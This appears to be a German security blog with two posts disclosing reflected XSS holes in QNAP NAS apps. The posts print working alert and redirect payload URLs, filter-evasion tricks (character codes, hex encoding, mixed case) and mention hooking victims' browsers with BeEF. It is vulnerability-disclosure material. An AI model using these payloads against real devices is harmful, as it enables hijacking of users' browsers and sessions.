Mit ‘QNAP’ getaggte Beiträge

Erneutes XSS bei QNAP Photostation

Veröffentlicht: 9. Juli 2014 in IT-Security, Netzwerke
Schlagwörter:, , , , ,

„◾Wer einen Fehler gemacht hat und ihn nicht korrigiert, begeht einen zweiten.“ – Konfuzius

Erneut entdeckte ich gestern eine XSS-Lücke in der Photostation von QNAP (aktuelle FW/APP). Diesmal sogar direkt in
der Live-Demo auf der Webseite von QNAP.

Da sich zwischenzeitlich QNAP bei mir gemeldet hat, verzichte ich vorerst darauf die Lücke im Detail zu beschreiben.

Bei dieser Lücke reicht es bereits die Photostation auch nur aktiv zu haben.
Es muss nicht mal zwingend ein Inhalt geteilt werden!

QNAPXSS4-3

QNAPXSS4-2

QNAPXSS4

„◾Fehler zu machen ist menschlich. Fehler zu wiederholen ist schmerzlich. Dieselben Fehler immer wieder zu machen ist dämlich„- Sinan Gönül

Man könnte denken bei QNAP lernt man kein Stück dazu. Nachdem ich bereits das CERT.at sowie QNAP selbst in der Vergangenheit auf mehrere XSS-Lücken in deren Apps hingewiesen hatte, stelle ich erneut fest, dass man wieder die Tore offen gelassen hat!

Bei einer Art von Bugbounty-Programm würde ich mir wohl an QNAP eine goldene Nase verdienen… #scnr

Diesmal: QNAP-Photostation V.3.2 (auf QNAP NAS TS259+ Pro – Firmware 4.0.7 vom 12.04.2014)

QNAPXSS201404

Hier ist es auf den ersten Blick nur möglich eine Zahl zu übergeben, aber mit dem richtigen Trick können wir auch Text einschleusen und unsere Funktionen etwas pimpen – hier ist dann einfach Kreativität gefragt ;-)

geht -> https://192.168.100.1:80/photo/?windowId=/><script>alert(1)</script>
geht nicht -> https://192.168.100.1:80/photo/?windowId=/><script>alert(„XSS“)</script>

geht doch; ausgetrickst -> https://192.168.100.1:80/photo/?windowId=/><script>alert(String.fromCharCode(88,83,83));</script>

QNAPXSS2014-2
Die Möglichkeiten solche XSS-Angriffe zu starten und eventuelle Filter zu umgehen sind vielfältig.
Werden auf der Webseite z.B. spezielle Zeichen wie single oder double-quote bewusst weggefilter,
so bleibt dem Angreifer die oben beschrieben Option mit Verwendung der ASCII-Character.

Auch HEX-Encoding wäre einen Versuch wert:
<script>alert(„XSSed“);</script> wird dann zu 3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%65%64%22%29%3b%3c%2f%73%63%72%69%70%74%3e

Das Script einfach via Obfuscation vor einem Filter zu „verbergen“ klappt sehr oft auch ganz gut:
<ScRipt>ALeRt(„XSSed“);</sCRipT>

In einigen Fällen ist das XSS erst möglich, wenn zuvor ein „Closing Tag“ gesetzt wird:
„><script>alert(„XSSed“);</script> bzw. /><script>alert(„XSSed“);</script

Links FYI:
ASCII-Converter & noch einer
fromCharCode()

 

 

QNAP-NAS: anfällig für cross-site-scripting (XSS)

Veröffentlicht: 21. Dezember 2012 in IT-Security, Netzwerke
Schlagwörter:, , , ,

Mir ist aufgefallen, dass in manchen Web-Anwendungen des QNAP-NAS nicht richtig geprüft wird, was übergeben wird.
So ist z.B. die Photostation und die TVStation anfällig für XSS.

[EDIT/ Nachtrag]
Die VideoStation ist ebenfalls für XSS anfällig wie ich eben gesehen habe.
http://192.168.100.125/videostation/search_result.php?query=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&str_search_videos=Videos+suchen&type=videos

Besonders ‚toll‘ dabei ist, dass dieser Code gleich zweimal von der Suche der VideoStation ausgeführt wird…!!

QNAP-Videostation

QNAP-Videostation

Hierbei kann einem Anwender ein untergejubelter manipulierter Link zum Verhängnis werden.
Viele Anwender schöpfen generell keinen Verdacht, wenn im ersten Bereich des URL etwas vertrautes,
wie etwa die eigene Domain steht…

QNAP-Info

QNAP-Info


Beispiel Photostation:

http://192.168.123.110/photostation/album.php?foldername=“><script>alert(1)</script>

QNAP-Photostation

QNAP-Photostation


Ähnlich verhält sich die TVStation bei Eingaben in das Suchfeld:

Redirect zu google.de gefällig? Damit niemand sofort weiss wohin es geht jagen wir es als ascii-to-hex durch ;)

http://192.168.123.110/tvstation/#search/%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%3e%3c%21%2d%2d%73%65%74%54%69%6d%65%6f%75%74%28%22%73%65%6c%66%2e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%64%65%27%22%2c%32%30%29%3b%2f%2f%2d%2d%3e%3c%2f%73%63%72%69%70%74%3e

QNAP-TVStation

QNAP-TVStation

Ich konnte ebenso erfolgreich einen BeEF-Hook einbinden, mit dem ich dann bequem den Browser unter Kontrolle hatte.
Von da aus ist es nur noch ein Katzensprung um den Browser des Anwenders auf eine mit einem Metasploit-Payload verseuchte Website zu entführen…

QNAP-BeEF'ed

QNAP-BeEF’ed

Hier muss QNAP schnell und sofort nachbessern!

So lange sollte man sich gut überlegen, ob man Photostation und TVStation für die Außenwelt als erreichbar schalten sollte…


Update:

QNAP hat zumindest schon zugesagt einen Fix dafür im nächsten Update auszuliefern.
Ebenso hat sich das CERT (Computer Emergency Response Team) um Aaron Kaplan der Sache angenommen.
Zuletzt hatte ich dort einen FTP-Leak zu den Servern von Adobe, Axel-Springer, DFB, HSV, RedBull etc. gemeldet.

Ein enstprechender Bericht auf securityfocus.com zum aktuellen Fall wird noch folgen.

-Link http://forum.qnap.com/viewtopic.php?f=21&t=68631

QNAP-Antwort

QNAP-Antwort

Update 2 (06.06.2013)

Heute lese ich bei Twitter, dass nun auch Heise.de über die Sicherheitslücken in QNAP-Geräten berichtet.
Heise berichtet, dass QNAP bei Banken, Polizei und dem Militär zum Einsatz kommt.
Ich kann dies zum Beispiel für Banken bestätigen (eine große Bank in den USA hat bei mir mal eine indiv. Software
für das NAS geordert). Aber Shodanhq.com gibt sicher gerne genauere Auskunft ;-)

Was das Offensive Security-Team also rausgefunden hat ist nicht wirklich neu.

Wann macht QNAP die Systeme endlich sicher? Vielleicht wäre es ein Anfang den Leuten, die diese
Lücken finden auch zuzuhören, oder mal etwas wie eine kleine finanzielle Entlohnung für die Aufdeckung
anzubieten.

Man möchte sich nicht vorstellen, was böswillige Zeitgenossen im Cyberspace mit den gefundenen Sicherheitslücken
anstellen können. Und das obene von mir beschriebene ist nur die Spitze vom Eisberg…..